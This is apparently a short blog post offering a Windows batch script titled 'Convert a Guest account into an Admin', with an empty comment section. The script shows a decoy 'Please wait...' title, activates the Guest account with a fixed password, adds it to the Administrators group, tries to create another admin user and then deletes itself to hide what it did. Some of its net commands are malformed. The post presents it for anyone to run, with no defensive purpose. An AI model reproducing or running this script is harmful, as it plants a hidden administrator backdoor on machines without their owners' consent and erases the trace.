<--
echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
-->
just run this file and your guest account will be admin.....
do post comments
0 comments: on "Convert a Guest account into an Admin"
Post a Comment